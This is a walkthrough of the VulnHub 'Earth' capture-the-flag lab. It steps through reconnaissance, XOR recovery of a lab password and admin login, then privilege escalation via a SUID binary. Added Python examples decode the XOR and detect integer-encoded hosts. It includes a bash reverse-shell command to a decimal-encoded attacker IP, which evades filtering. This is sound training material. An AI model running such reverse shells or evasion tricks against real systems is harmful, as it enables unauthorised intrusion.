Walkthrough : VulnHub : The Planets: Earth

Suhel Kathi
Apr 10, 2022

About VulnHub

VulnHub offers offline virtual machines, allowing users to practice without competing with other learners. There’s no need to worry about consistent internet access, high pings, or latency. Users can set up their own private labs to practice and learn new skills.

THE PLANETS: EARTH

Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware.

Link : https://www.vulnhub.com/entry/the-planets-earth,755/

OBJECTIVE

Network security is concerned not only with the security of the computers at each end of the communication chain; it also aims to ensure that the entire network is secure.

Network security entails protecting the usability, reliability, integrity, and safety of the network and its data. Effective network security stops a variety of threats from entering or spreading on a network.

The primary goals of network security are Confidentiality, Integrity, and Availability. These three pillars of network security are often represented as the CIA triangle.

SCOPE

There are two flags on the box: a user and root flag which include an md5 hash.

Disclaimer

All information, techniques and tools described in this write-up are for educational purposes only. Use anything in this write-up at your own discretion, I cannot be held responsible for any damages caused to any systems or yourselves legally. Usage of all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. It is your responsibility to obey all applicable local, state and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using information herein.

Let’s Get Started

sudo arp-scan -l : To find out THE PLANETS: EARTH IP Address

Arp-scan is a low-level network discovery tool used to associate physical (MAC) addresses to logical (IP) addresses. It’s used to identify network assets which may not normally be captured by network scanning devices.

nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine for scanning single hosts.

So we used nmap -A -T4 192.168.0.107

  • -A = aggressive scan, -T4 = fast scan (sets the speed of the scan)

After the scan we know there are 3 open ports on the target machine: 22, 80 and 443.

On port 443 the certificate had the alternative names earth.local & terratest.earth.local

So I read my /etc/hosts file and didn’t find earth.local or the other name, so I added them manually using nano, and it worked for me.

So I opened terratest.earth.local in the browser and got this result

In this interface we have found these messages in encrypted format

Here I tried the /robots.txt file on a guess, so I browsed to that path

https://terratest.earth.local/robots.txt and got this interface

Now let’s visit the testingnotes path in the browser

Checking each variation of /testingnotes.*, I eventually found /testingnotes.txt

Here we found some information:

the username terra and a testdata.txt file, so I opened that file

With this information, I opened CyberChef and searched for XOR. I put the above text into the XOR key field of CyberChef as UTF-8, and in the input field I gave the last of the encrypted messages. That gave me this output.

Now we got the username and password

Username : terra

Password : earthclimatechangebad4humans
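The XOR step above, reproduced offline as an added example (not code from the original write-up). The key text is a constructed stand-in because the testdata.txt contents are not reproduced here, and hex encoding of the message is an assumption. It shows why XOR gives no confidentiality when the key is published on the same server: the plaintext comes back as one short string repeated.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key if it is shorter than data."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

def shortest_period(text: str) -> str:
    """Shortest prefix that reproduces text when repeated (last repeat may be cut)."""
    for n in range(1, len(text) + 1):
        if all(text[i] == text[i % n] for i in range(len(text))):
            return text[:n]
    return text

# Constructed sample data: stand-in key text, plus the password from this page.
KEY_TEXT = b"Constructed stand-in for the testdata.txt contents, used here as the XOR key."
SECRET = "earthclimatechangebad4humans"

def make_sample_hex() -> str:
    """Build a hex message the way the page's output suggests: secret repeated, XORed with the key."""
    repeats = len(KEY_TEXT) // len(SECRET) + 1
    stream = (SECRET * repeats)[:len(KEY_TEXT)]
    return xor_bytes(stream.encode(), KEY_TEXT).hex()

def recover(hex_message: str, key: bytes) -> str:
    """Undo the XOR and collapse the repeated plaintext to a single copy."""
    plain = xor_bytes(bytes.fromhex(hex_message), key).decode("utf-8", errors="replace")
    return shortest_period(plain)

if __name__ == "__main__":
    message = make_sample_hex()
    print("ciphertext (hex):", message[:48], "...")
    print("recovered       :", recover(message, KEY_TEXT))
```
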

Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains.

With gobuster I found the /admin directory

Now let’s log in at /admin with the credentials above

Successfully Logged in

I tried a reverse shell but that didn’t work, so I converted my IP address to decimal, tried this in the CLI command field, and successfully got the reverse shell

bash -i >& /dev/tcp/3232235626/5678 0>&1
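From the defender's side, a log rule that only matches dotted-quad addresses misses the integer form used above. The following added example (not part of the original write-up) normalises the host in /dev/tcp redirections found in command logs; the log lines are constructed samples and the function names are hypothetical.

```python
import ipaddress
import re

# bash network redirection: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/tcp/([^/\s]+)/(\d{1,5})")

def normalize_host(host: str):
    """Return the dotted-quad form of a dotted or pure-integer IPv4 host, else None."""
    if re.fullmatch(r"[0-9]+", host):
        value = int(host)
        return str(ipaddress.IPv4Address(value)) if value <= 0xFFFFFFFF else None
    try:
        return str(ipaddress.IPv4Address(host))
    except ipaddress.AddressValueError:
        return None  # a hostname or malformed address

def find_dev_tcp(command: str):
    """List (host, port, integer_encoded) for every /dev/tcp use in a command line."""
    hits = []
    for host, port in DEV_TCP.findall(command):
        encoded = re.fullmatch(r"[0-9]+", host) is not None
        hits.append((normalize_host(host) or host, int(port), encoded))
    return hits

# Constructed sample log lines (the first is the command from this page).
SAMPLE_LOG = [
    "bash -i >& /dev/tcp/3232235626/5678 0>&1",
    "exec 3<>/dev/tcp/192.168.0.106/80",
    "ls -la /var/www",
]

def integer_encoded_lines(lines):
    """Return the lines whose /dev/tcp host is an integer-encoded IPv4 address."""
    return [l for l in lines if any(enc for _, _, enc in find_dev_tcp(l))]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(find_dev_tcp(line), "<-", line)
```
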

Now we’re going to go ahead and spawn a TTY shell using python

Now let’s hunt for root access

find / -perm -4000 2>/dev/null

The find command searches for files and directories that match the conditions you specify; here, -perm -4000 restricts the results to files with the setuid bit set.

/usr/bin/reset_root looks interesting.

Let’s check the file using strings

The Linux strings command prints the printable character sequences found in files. It is mainly used to inspect and extract text from binary (non-text) files.

After this we copied the reset_root file to the local machine

And gave all permissions to that file

chmod 777: this command gives read, write and execute permission to the owner, group and public.

I tried to execute the file but it gave me this

And then I ran ltrace on it: ltrace ./reset_root

ltrace is a diagnostic and debugging tool for the command line that can be used to display calls that are made to shared libraries. It uses the dynamic library hooking mechanism, which prevents it from tracing calls to statically linked libraries. ltrace also displays return values of the library calls.

From the output, we can see that three files must be present at the locations shown for the trigger to run. Therefore, I created those files on the target.

Now let’s switch to root

Then change directory to root and grab root_flag.txt

Conclusion

Network security helps protect your workstations from harmful spyware. It also ensures that shared data is kept secure.

Network Security protects your network and data from breaches, intrusions and other threats. This is a vast and overarching term that describes hardware and software solutions as well as processes or rules and configurations relating to network use, accessibility, and overall threat protection.

This is the end. Thank you for reading this write-up.
